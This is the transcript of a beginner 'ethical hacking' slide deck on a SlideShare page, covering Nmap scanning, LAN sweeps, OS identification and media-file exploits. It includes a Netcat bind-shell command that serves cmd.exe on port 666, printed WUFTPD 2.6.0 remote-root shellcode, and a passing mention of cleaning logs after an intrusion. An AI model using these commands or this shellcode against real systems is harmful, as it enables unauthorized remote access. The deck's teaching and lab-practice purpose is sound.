Your SlideShare is downloading. ×
Security & ethical hacking
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Security & ethical hacking

173
views

Published on

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
173
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Security & “Ethical” Hacking By:-Amanpreet Singh Presentation #1– Advanced Scanning & Exploitation
  • 2. Introduction Again “Ethical” hacking Do you Sniff before you taste? Patience, persistence, some other motivational p word… Have phun, getting frustrated is normal
  • 3. About Me
  • 4. Overview Advanced scanning with NMAP (as seen in the Matrix) Local IP Sweeping & its importance Netcat rooting, a simple shell Identify Station ( operating system ) Brief Exploit talk & Shell code Exploits via Jpgs, Pngs, Mp3s, etc. Conclusion
  • 5. Advanced Scanning (NMAP) Ok, we have acquired an IP (or range of) and we want to find out some information about this system. We will use a very popular program named Nmap. Almost every Linux install its packaged, Windows you will need to download Nmap and the Win-Pcap files.
  • 6. Advanced Scanning (NMAP) Lets look at some of the information techniques provided by nmapSCAN TECHNIQUES:-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans-sU: UDP Scan-sN/sF/sX: TCP Null, FIN, and Xmas scans--scanflags <flags>: Customize TCP scan flags-sI <zombie host[:probeport]>: Idlescan-sO: IP protocol scan-b <ftp relay host>: FTP bounce scan We will be using another scan technique to probe open ports and determine service/versions in use: -sV
  • 7. Advanced Scanning (NMAP) So lets run a -sV scan along with -v for verbose and -O for OS detection
  • 8. Advanced Scanning (NMAP) So lots of gibberish, but we can sort through this for VERY important details! First: we have all of the open ports, along with what versions they are running! Port 139.. Very interesting. Second: we also found out the operating system! Windows 98 SE… that will be later.
  • 9. Protection from NMAP Keep those firewalls up if you’re not a server and you’re not hosting. There is not much you can do.. and NMAP can be extremely stealthy using advanced techniques. It is scary how much information can be acquired about you by a simple sniff and run.
  • 10. Local IP Sweeping The LAN is the weakest network generally Open ports, open boxes, free IPs, easy sweeps Vast majority of people feel other computers within the LAN are not hackers, but compromise a wireless router & bam…
  • 11. Using Angry IP Scanner Again! Angry IP Scanner; Its script kiddie, but it works very well, and is faster than NMAP Lets grab our local IP on the network, and begin our scan, so we are currently 192.168.5.100, and we know our range is 192.168.5.* Use Angry IP Scanner just to find available peers on the network, this is VERY useful for a compromised wireless router or compromised system on a router
  • 12. We Have Local Victims! Okay, we have local victims, we can now use Nmap on each victim. Nmap will also bypass firewalls given enough time with the –P0 option. Once we know operating systems, open ports, we can use online security search tools such as www.securityfocus.com and locate exploits!
  • 13. Importance of Local Sweeps Compromised routers = compromised systems, vulnerable on the inside only. Apply a full control root kit to a computer behind a router, and you have LAN access… hence local IP sweeping Viruses often spread within a network (commercial, government, etc.) using LAN sweeps
  • 14. Netcat Rooting (Simple Shell) Ok, we want to see what kind of access a shell really has on a system.  Shell referring to a command prompt window on another computer. Netcat is a very useful UDP/TCP raw client/server that can also double as a nice shell. A windows version is free to download, Linux generally comes with NC in the shell already.
  • 15. Client/Server Determine which computer you want to have a shell on, and put nc.exe somewhere on there. Next run nc.exe with the following parameters: nc.exe –l –p 666 –e “cmd.exe” This will execute Netcat to listen on port 666, and when connected, it will execute and send the output of cmd.exe on the server.
  • 16. Client Connection Client now connects to the server using the corresponding line: nc.exe 192.168.77.2 666 And Viola! Netcat shell over the network.
  • 17. Why Netcat Root? A nice way to make your first root, easy to expand on this. Potential is HUGE when the –e “???” command is used. Netcat is open source, so you can venture the source code to understand how exactly Netcat does this. This also works in Unix, just replace cmd.exe with a Unix shell ;)
  • 18. Identify Station Continuation of Nmap OS discovery Once we have found a target, what kind of operating system is it running? Nmap -O command will usually show you, unless the computer has a firewall on.
  • 19. Importance of OS ID Exploiting and choice of exploits/roots is always dependent on the type of OS Do we want to look for likely exploits, find a more aggressive approach, or leave it.  For example, Linux servers often have a SSH server open, we can either nmap –sV and exploit, or try to bruteforce. Need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)
  • 20. Brief Exploits & Shell Code Exploits come in all sorts of languages & sizes. Some are simple run once on an IP, others have various options and offsets. Exploits are used as a way of getting into a system, shell code is what happens AFTER the exploit is successful. Shell code will always vary with experienced hackers, as they will always have useful shells on hand.
  • 21. Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT char linuxcode[]= /* Lam3rZ chroot() code */ "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb" "x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31" "xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27" "xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31" "xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d" "x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46" "x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8" "x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c" "x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0" "x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff" "x30x62x69x6ex30x73x68x31x2ex2ex31x31"; This is machine code, used to give specific calls in Linux that will call chroot() and give the hacker a shell on the vulnerable system. This is public knowledge, just type the following in Google: wuftpd exploit filetype:c
  • 22. More on Shells Later Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject this in a later presentation. Shells are scary to look at because if you do not know the machine code or the system its intended for, there is absolutely no way to know what its doing, but it can compromise a system!
  • 23. Exploits via Jpg, Pngs, Mp3s Exploits come in many varieties, as it just takes a stray string call or a bad size check to make a program vulnerable. All sorts of formats have been vulnerable, for example the famous GDI+ Jpg vulnerability that would execute code just by viewing a jpg!
  • 24. GDI+ Jpg vulnerabilityPosted on Sept. 30, 2004 “In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing users computer is then infected. Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing.
  • 25. Exploits via Jpg, Pngs, Mp3s Other vulnerabilities in the form of Pngs and Mp3s have come into the wild. One Mp3 would use the header to execute a shell in Winamp when the meta-data was loaded. A Png exploit in MSN Messenger would allow hackers to put shellcode in a Png and display it as a buddy icon to other users.
  • 26. Just because its media… Just because you’re viewing a jpg, png, mp3, wmv, you could still be running something that exploits your computer. Many people think exploits come in very limited forms of scripts, tcp/udp injections or executables, but there are many ways in.
  • 27. Resources If this type of information interests you, there are many safe online resources. www.hackthissite.org - a friendly playground for web hackers www.phrack.org - a very good place for random articles with great pieces of info www.securityfocus.com - some of the best up-to- date info about vulnerabilities and exploits.
  • 28. Conclusion Again, I emphasize just because I’m showing you this, does NOT make it legal.  In fact, scanning government systems with NMAP and getting caught can land you with fines & possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not know about. Remember, finding exploits that work is tedious, not everything you find online works every time. Setup a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it. Ex. Wuftpd 2.60. Have fun, it takes work so don’t give up!
  • 29. Thank You For Your Time! Feel free to email me any questions/comments at Er.dehaljatt@gmail.com

×